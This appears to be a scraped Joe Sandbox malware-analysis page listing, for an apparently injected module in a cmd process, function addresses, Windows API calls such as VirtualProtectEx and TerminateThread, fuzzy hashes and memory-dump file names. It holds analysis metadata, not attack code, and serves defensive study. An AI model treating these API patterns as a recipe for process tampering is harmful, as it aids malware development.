Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: d25476b845b4956b49fdb13d1ffb400953ed12fa4d8b35e0d0c74cb8f991257d
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 9A315C21212F40D2FE53DB26AC087A5A3D4FB5EBAAF590625AD194B7D4EB38C5488318

Function 000002527DF19AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000002527DF19C6B,?,?,?,000002527DF1945C,?,?,?,?,000002527DF18F65), ref: 000002527DF19B31
GetLastError.KERNEL32(?,?,?,000002527DF19C6B,?,?,?,000002527DF1945C,?,?,?,?,000002527DF18F65), ref: 000002527DF19B3F
LoadLibraryExW.KERNEL32(?,?,?,000002527DF19C6B,?,?,?,000002527DF1945C,?,?,?,?,000002527DF18F65), ref: 000002527DF19B69
FreeLibrary.KERNEL32(?,?,?,000002527DF19C6B,?,?,?,000002527DF1945C,?,?,?,?,000002527DF18F65), ref: 000002527DF19BD7
GetProcAddress.KERNEL32(?,?,?,000002527DF19C6B,?,?,?,000002527DF1945C,?,?,?,?,000002527DF18F65), ref: 000002527DF19BE3

Strings

api-ms-, xrefs: 000002527DF19B51

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 9f5574d6cb9bfe00d1162653ea34bd125b54e33afb07219278a46be80e9d3884
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: EF31C021212E40D1EE15DB02AC087A9A395FB4EBA2F590624ED3D4B7D4EF39D54CC38A

Function 000002527DEF3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002527DEF3431
GetLastError.KERNEL32 ref: 000002527DEF343D
CloseHandle.KERNEL32 ref: 000002527DEF3455
CreateFileW.KERNEL32 ref: 000002527DEF3480
WriteConsoleW.KERNEL32 ref: 000002527DEF349F

Strings

CONOUT$, xrefs: 000002527DEF3461

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 912798e3bffc6f1af4798feb7230ba2f93ccab9b12a94d351805c4cbedb84221
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 7C116031310F50C7E791CB52EC58719A6A4F79EBE6F444214EA5E87BD4DF38C5088748

Function 000002527DF23400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002527DF23431
GetLastError.KERNEL32 ref: 000002527DF2343D
CloseHandle.KERNEL32 ref: 000002527DF23455
CreateFileW.KERNEL32 ref: 000002527DF23480
WriteConsoleW.KERNEL32 ref: 000002527DF2349F

Strings

CONOUT$, xrefs: 000002527DF23461

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 88091b96aacfae45cd8c1938257aee1f756d3e772f66cf74d6a7f33a0ca50895
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: D9115E61210F80C6E750CB52FC6871EA6A0F78DBE6F544214EA6E87BD4CF38D508878A

Function 000002527DEE6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002527DEE62AB
GetThreadContext.KERNEL32 ref: 000002527DEE6415

Part of subcall function 000002527DEE60A0: GetCurrentThreadId.KERNEL32 ref: 000002527DEE60A4

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 503f21be21535dfe44e0be62a07dbcad13fac42fb84f132db437f8b79aca50fa
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: EDD17876204F88C2EB71DB1AE89835AB7A0F38DB89F500616EA8D477E5DF38C555CB04

Function 000002527DF16270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002527DF162AB
GetThreadContext.KERNEL32 ref: 000002527DF16415

Part of subcall function 000002527DF160A0: GetCurrentThreadId.KERNEL32 ref: 000002527DF160A4

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 249f9969b5c806dbf6d37b9ec9d506909f8a873facabf69c183254d08d0ccfee
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: FCD17676208F88C2DA70DB0AE89835AA7A0F38DB89F110116EADD477E9DF3DC555CB05

Function 000002527DEE2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000002527DEE20A6
TlsFree.KERNEL32 ref: 000002527DEE225F
TlsFree.KERNEL32 ref: 000002527DEE226B
TlsFree.KERNEL32 ref: 000002527DEE2277
TlsFree.KERNEL32 ref: 000002527DEE2283
TlsFree.KERNEL32 ref: 000002527DEE228F

Part of subcall function 000002527DEE5E50: GetCurrentThreadId.KERNEL32 ref: 000002527DEE5E66

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 470b762f2fbd9dafc48e4f602a89f117e96816887e9ff9e3eacf42ba27104674
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 7851BE30201F45D6FB06DF24EC982A8A3A1FB1E74AF804819A92D473E5EF78C61CC358

Function 000002527DF12098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000002527DF120A6
TlsFree.KERNEL32 ref: 000002527DF1225F
TlsFree.KERNEL32 ref: 000002527DF1226B
TlsFree.KERNEL32 ref: 000002527DF12277
TlsFree.KERNEL32 ref: 000002527DF12283
TlsFree.KERNEL32 ref: 000002527DF1228F

Part of subcall function 000002527DF15E50: GetCurrentThreadId.KERNEL32 ref: 000002527DF15E66

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: e0f370df7f09f8b4a64260c452671bffa197cfc2c5f855e68fb19aa8390f2417
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 79510534211F45D6EF05DB68ECA9298A3A1FB0E786F840915E93C063E9EF39C51CC35A

Function 000002527DEE35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000002527DEE24D1), ref: 000002527DEE35EB
HeapAlloc.KERNEL32(?,?,?,?,?,000002527DEE24D1), ref: 000002527DEE35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000002527DEE24D1), ref: 000002527DEE3673
GetProcessHeap.KERNEL32(?,?,?,?,?,000002527DEE24D1), ref: 000002527DEE36D9
HeapFree.KERNEL32(?,?,?,?,?,000002527DEE24D1), ref: 000002527DEE36E7

Strings

$rbx-, xrefs: 000002527DEE366C

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: e4d6b75a9aeb01abd49adcfefc2d4ece883cd69ef8c8499da56306ec7fa980e0
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 41317E31701F56C3FA52DF36D948269E3A0FB5AF86F8844208E4847BD5EB34D4A98704

Function 000002527DF135C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000002527DF124D1), ref: 000002527DF135EB
HeapAlloc.KERNEL32(?,?,?,?,?,000002527DF124D1), ref: 000002527DF135FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000002527DF124D1), ref: 000002527DF13673
GetProcessHeap.KERNEL32(?,?,?,?,?,000002527DF124D1), ref: 000002527DF136D9
HeapFree.KERNEL32(?,?,?,?,?,000002527DF124D1), ref: 000002527DF136E7

Strings

$rbx-, xrefs: 000002527DF1366C

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: bba34257ec61664b0614a78b9033fa7a1fa1622ffc65ed6a24464132897b4a13
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 61318F22701F55D3EA11DF16AD48B6AE3E0FB5AB85F084020CF6807BD5EF39D4A98749

Function 000002527DEEC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002527DEEC94F
SetLastError.KERNEL32 ref: 000002527DEEC96E
FlsSetValue.KERNEL32 ref: 000002527DEEC997
FlsSetValue.KERNEL32 ref: 000002527DEEC9A8
FlsSetValue.KERNEL32 ref: 000002527DEEC9B9

Part of subcall function 000002527DEED2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002527DEE674A), ref: 000002527DEED2B6
Part of subcall function 000002527DEED2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002527DEE674A), ref: 000002527DEED2C0

SetLastError.KERNEL32 ref: 000002527DEEC9DC

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 1c8ac6b188bebe2a6c7345b89ed758822f8cce582729b28e9e88213f5e3ebcdf
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 09113321300E40C3FA56E731EC5D36EA251EB9F792F984625E86A5B3CEDE38D549430C

Function 000002527DF1C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002527DF1C94F
SetLastError.KERNEL32 ref: 000002527DF1C96E
FlsSetValue.KERNEL32 ref: 000002527DF1C997
FlsSetValue.KERNEL32 ref: 000002527DF1C9A8
FlsSetValue.KERNEL32 ref: 000002527DF1C9B9

Part of subcall function 000002527DF1D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002527DF1674A), ref: 000002527DF1D2B6
Part of subcall function 000002527DF1D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002527DF1674A), ref: 000002527DF1D2C0

SetLastError.KERNEL32 ref: 000002527DF1C9DC

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: a60ea011f1958ee17843ec50aa47e9ddf3601cbd722d2dac20d5af48567f3735
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 03119421300E90C2F718EB316C1D36ED651DB8F7A6F984225ED76567CACE3ED409430A

Function 000002527DEE1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002527DEE1A56
K32GetModuleFileNameExW.KERNEL32 ref: 000002527DEE1A74
PathFindFileNameW.SHLWAPI ref: 000002527DEE1A83
lstrlenW.KERNEL32 ref: 000002527DEE1A8F
StrCpyW.SHLWAPI ref: 000002527DEE1AA2
CloseHandle.KERNEL32 ref: 000002527DEE1AB0

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 81c6b14d5856d3cc49bf4e7d151ac78b8e5e4677dbfebfe14fdf2a9eed0d8ee2
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 8C015B21700E40C3EA51DB22E858759A3A1F79EFC1F484035DE5D437D8DE38C689C754

Function 000002527DF11A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002527DF11A56
K32GetModuleFileNameExW.KERNEL32 ref: 000002527DF11A74
PathFindFileNameW.SHLWAPI ref: 000002527DF11A83
lstrlenW.KERNEL32 ref: 000002527DF11A8F
StrCpyW.SHLWAPI ref: 000002527DF11AA2
CloseHandle.KERNEL32 ref: 000002527DF11AB0

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 8062ea3777361aaf769fd104c42247a1a4f26637bc06a07f7c42cb638b46b80b
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: EC015B21700E41C2EA10DB12AC5835AA3A1F78DFD1F484034DE6D437D4DE3CC98AC799

Function 000002527DEE3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000002527DEE3AAC), ref: 000002527DEE3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002527DEE3AAC), ref: 000002527DEE3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002527DEE3AAC), ref: 000002527DEE3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002527DEE3AAC), ref: 000002527DEE3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002527DEE3AAC), ref: 000002527DEE3E9F
TerminateThread.KERNEL32(?,?,?,?,?,000002527DEE3AAC), ref: 000002527DEE3EAE

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 48e0aec2aa3bb7b15e76ab03b726558a19bfd44b6c478f71e48c1180bed0edc5
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 31010565211F40C3FB66DB21EC4CB5AB2A0EB5EB46F044028DA49463E8EF3DC54C8708

Function 000002527DF13E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000002527DF13AAC), ref: 000002527DF13E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002527DF13AAC), ref: 000002527DF13E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002527DF13AAC), ref: 000002527DF13E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002527DF13AAC), ref: 000002527DF13E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002527DF13AAC), ref: 000002527DF13E9F
TerminateThread.KERNEL32(?,?,?,?,?,000002527DF13AAC), ref: 000002527DF13EAE

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 5585ebcf1926b34883c6413f8be55c63534ce7dc8660c0889ec95876b78b88b0
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: E3011B65211F41C2EB24DB65EC5C75AB2A0FB4EB96F080024C96D063E8EF3DC04C879A

Function 000002527DEE1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002527DEE1AF4
StrCmpNIW.SHLWAPI ref: 000002527DEE1B0E
lstrlenW.KERNEL32 ref: 000002527DEE1B1D
StrCpyW.SHLWAPI ref: 000002527DEE1B32

Strings

\\?\, xrefs: 000002527DEE1B02

Memory Dump Source

